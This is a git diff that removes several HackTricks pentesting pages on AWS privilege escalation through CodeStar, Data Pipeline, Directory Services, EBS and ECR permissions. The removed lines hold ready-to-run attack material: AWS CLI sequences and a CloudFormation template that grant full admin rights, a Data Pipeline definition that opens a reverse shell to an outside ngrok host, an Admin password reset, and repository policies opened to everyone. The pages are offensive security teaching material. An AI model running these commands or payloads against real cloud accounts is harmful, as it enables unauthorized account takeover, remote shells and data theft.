- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Codestar - -You can find more information about codestar in: - -{% content-ref url="codestar-createproject-codestar-associateteammember.md" %} -[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md) -{% endcontent-ref %} - -### `iam:PassRole`, `codestar:CreateProject` - -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page: - -{% content-ref url="iam-passrole-codestar-createproject.md" %} -[iam-passrole-codestar-createproject.md](iam-passrole-codestar-createproject.md) -{% endcontent-ref %} - -### `codestar:CreateProject`, `codestar:AssociateTeamMember` - -This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**. - -```bash -PROJECT_NAME="supercodestar" - -aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME - -echo "Waiting 1min to start the project" -sleep 60 - -USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"') - -aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \ - --project-id $PROJECT_NAME \ - --user-arn "$USER_ARN" \ - --project-role "Owner" \ - --remote-access-allowed -``` - -If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember` - -**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in: - -{% content-ref url="codestar-createproject-codestar-associateteammember.md" %} -[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md) -{% endcontent-ref %} - -### `codestar:CreateProjectFromTemplate` - -1. **Create a New Project:** - * Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project. - * Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**. - * This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role. -2. **Update the Target Stack:** - * With the granted CloudFormation permissions, proceed to update the specified stack. - * The stack's name will typically conform to one of two patterns: - * `awscodestar--infrastructure` - * `awscodestar--lambda` - * The exact name depends on the chosen template (referencing the example exploit script). -3. **Access and Permissions:** - * Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack. - * Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further. - -For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\ -You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar\_createprojectfromtemplate\_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py) - -**Potential Impact:** Privesc to cloudformation IAM role. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md deleted file mode 100644 index 883d19f18..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md +++ /dev/null @@ -1,115 +0,0 @@ -# codestar:CreateProject, codestar:AssociateTeamMember - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -This is the created policy the user can privesc to (the project name was `supercodestar`): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "1", - "Effect": "Allow", - "Action": [ - "codestar:*", - "iam:GetPolicy*", - "iam:ListPolicyVersions" - ], - "Resource": [ - "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", - "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", - "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" - ] - }, - { - "Sid": "2", - "Effect": "Allow", - "Action": [ - "codestar:DescribeUserProfile", - "codestar:ListProjects", - "codestar:ListUserProfiles", - "codestar:VerifyServiceRole", - "cloud9:DescribeEnvironment*", - "cloud9:ValidateEnvironmentName", - "cloudwatch:DescribeAlarms", - "cloudwatch:GetMetricStatistics", - "cloudwatch:ListMetrics", - "codedeploy:BatchGet*", - "codedeploy:List*", - "codestar-connections:UseConnection", - "ec2:DescribeInstanceTypeOfferings", - "ec2:DescribeInternetGateways", - "ec2:DescribeNatGateways", - "ec2:DescribeRouteTables", - "ec2:DescribeSecurityGroups", - "ec2:DescribeSubnets", - "ec2:DescribeVpcs", - "events:ListRuleNamesByTarget", - "iam:GetAccountSummary", - "iam:GetUser", - "iam:ListAccountAliases", - "iam:ListRoles", - "iam:ListUsers", - "lambda:List*", - "sns:List*" - ], - "Resource": [ - "*" - ] - }, - { - "Sid": "3", - "Effect": "Allow", - "Action": [ - "codestar:*UserProfile", - "iam:GenerateCredentialReport", - "iam:GenerateServiceLastAccessedDetails", - "iam:CreateAccessKey", - "iam:UpdateAccessKey", - "iam:DeleteAccessKey", - "iam:UpdateSSHPublicKey", - "iam:UploadSSHPublicKey", - "iam:DeleteSSHPublicKey", - "iam:CreateServiceSpecificCredential", - "iam:UpdateServiceSpecificCredential", - "iam:DeleteServiceSpecificCredential", - "iam:ResetServiceSpecificCredential", - "iam:Get*", - "iam:List*" - ], - "Resource": [ - "arn:aws:iam::947247140022:user/${aws:username}" - ] - } - ] -} -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md deleted file mode 100644 index 60d1b28c4..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md +++ /dev/null @@ -1,118 +0,0 @@ -# iam:PassRole, codestar:CreateProject - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. - -To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**: - -{% code title="toolchain.json" %} -```json -{ - "Resources": { - "supercodestar": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "ManagedPolicyName": "CodeStar_supercodestar", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "*", - "Resource": "*" - } - ] - }, - "Users": [ - "" - ] - } - } - } -} -``` -{% endcode %} - -Also **upload** this `empty zip` file to the **bucket**: - -{% file src="../../../../.gitbook/assets/empty.zip" %} - -Remember that the **bucket with both files must be accessible by the victim account**. - -With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project: - -```bash -PROJECT_NAME="supercodestar" - -# Crecte the source JSON -## In this JSON the bucket and key (path) to the empry.zip file is used -SOURCE_CODE_PATH="/tmp/surce_code.json" -SOURCE_CODE="[ - { - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"empty.zip\" - } - }, - \"destination\": { - \"codeCommit\": { - \"name\": \"$PROJECT_NAME\" - } - } - } -]" -printf "$SOURCE_CODE" > $SOURCE_CODE_PATH - -# Create the toolchain JSON -## In this JSON the bucket and key (path) to the toolchain.json file is used -TOOLCHAIN_PATH="/tmp/tool_chain.json" -TOOLCHAIN="{ - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"toolchain.json\" - } - }, - \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" -}" -printf "$TOOLCHAIN" > $TOOLCHAIN_PATH - -# Create the codestar project that will use the cloudformation epxloit to privesc -aws codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME \ - --source-code file://$SOURCE_CODE_PATH \ - --toolchain file://$TOOLCHAIN_PATH -``` - -This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc\_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md deleted file mode 100644 index 4e5b80724..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md +++ /dev/null @@ -1,100 +0,0 @@ -# AWS - Datapipeline Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## datapipeline - -For more info about datapipeline check: - -{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %} -[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) -{% endcontent-ref %} - -### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline` - -Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:** - -```bash -aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string -``` - -After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations: - -```json -{ - "objects": [ - { - "id" : "CreateDirectory", - "type" : "ShellCommandActivity", - "command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", - "runsOn" : {"ref": "instance"} - }, - { - "id": "Default", - "scheduleType": "ondemand", - "failureAndRerunMode": "CASCADE", - "name": "Default", - "role": "assumable_datapipeline", - "resourceRole": "assumable_datapipeline" - }, - { - "id" : "instance", - "name" : "instance", - "type" : "Ec2Resource", - "actionOnTaskFailure" : "terminate", - "actionOnResourceFailure" : "retryAll", - "maximumRetries" : "1", - "instanceType" : "t2.micro", - "securityGroups" : ["default"], - "role" : "assumable_datapipeline", - "resourceRole" : "assumable_ec2_profile_instance" - }] -} -``` - -{% hint style="info" %} -Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**. - -Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one). -{% endhint %} - -```bash -aws datapipeline put-pipeline-definition --pipeline-id \ - --pipeline-definition file:///pipeline/definition.json -``` - -The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges. - -**Potential Impact:** Direct privesc to the ec2 service role specified. - -## References - -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md deleted file mode 100644 index 33898f048..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md +++ /dev/null @@ -1,60 +0,0 @@ -# AWS - Directory Services Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Directory Services - -For more info about directory services check: - -{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %} -[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md) -{% endcontent-ref %} - -### `ds:ResetUserPassword` - -This permission allows to **change** the **password** of any **existent** user in the Active Directory.\ -By default, the only existent user is **Admin**. - -``` -aws ds reset-user-password --directory-id --user-name Admin --new-password Newpassword123. -``` - -### AWS Management Console - -It's possible to enable an **application access URL** that users from AD can access to login: - -
- -And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console: - -
- -There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md deleted file mode 100644 index 3fedf519a..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md +++ /dev/null @@ -1,49 +0,0 @@ -# AWS - DynamoDB Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## dynamodb - -For more info about dynamodb check: - -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**: - -{% content-ref url="../aws-post-exploitation/aws-dynamodb-post-exploitation.md" %} -[aws-dynamodb-post-exploitation.md](../aws-post-exploitation/aws-dynamodb-post-exploitation.md) -{% endcontent-ref %} - -### TODO: Read data abusing data Streams - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md deleted file mode 100644 index 29cc69d95..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - EBS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EBS - -### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots` - -An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in: - -{% content-ref url="../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md" %} -[aws-ebs-snapshot-dump.md](../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) -{% endcontent-ref %} - -Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags` - -The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**. - -**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords). - -### **`ec2:CreateSnapshot`** - -Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. - -You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md deleted file mode 100644 index 9a84a0d29..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md +++ /dev/null @@ -1,136 +0,0 @@ -# AWS - ECR Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECR - -### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage` - -An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images. - -For more info on how to download images: - -{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} -[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md) -{% endcontent-ref %} - -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. - -### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart` - -An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used. - -To learn how to upload a new image/update one, check: - -{% content-ref url="../aws-services/aws-eks-enum.md" %} -[aws-eks-enum.md](../aws-services/aws-eks-enum.md) -{% endcontent-ref %} - -### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart` - -Like the previous section, but for public repositories. - -### `ecr:SetRepositoryPolicy` - -An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\ -For example, in this example read access is given to everyone. - -```bash -aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json -``` - -Contents of `my-policy.json`: - -```json -{ - "Version" : "2008-10-17", - "Statement" : [ - { - "Sid" : "allow public pull", - "Effect" : "Allow", - "Principal" : "*", - "Action" : [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] -} -``` - -### `ecr-public:SetRepositoryPolicy` - -Like the previoous section, but for public repositories.\ -An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges. - -{% code overflow="wrap" %} -```bash -bashCopy code# Create a JSON file with the malicious public repository policy -echo '{ - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "MaliciousPublicRepoPolicy", - "Effect": "Allow", - "Principal": "*", - "Action": [ - "ecr-public:GetDownloadUrlForLayer", - "ecr-public:BatchGetImage", - "ecr-public:BatchCheckLayerAvailability", - "ecr-public:PutImage", - "ecr-public:InitiateLayerUpload", - "ecr-public:UploadLayerPart", - "ecr-public:CompleteLayerUpload", - "ecr-public:DeleteRepositoryPolicy" - ] - } - ] -}' > malicious_public_repo_policy.json - -# Apply the malicious public repository policy to the ECR Public repository -aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json -``` -{% endcode %} - -**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images. - -### `ecr:PutRegistryPolicy` - -An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**. - -```bash -aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
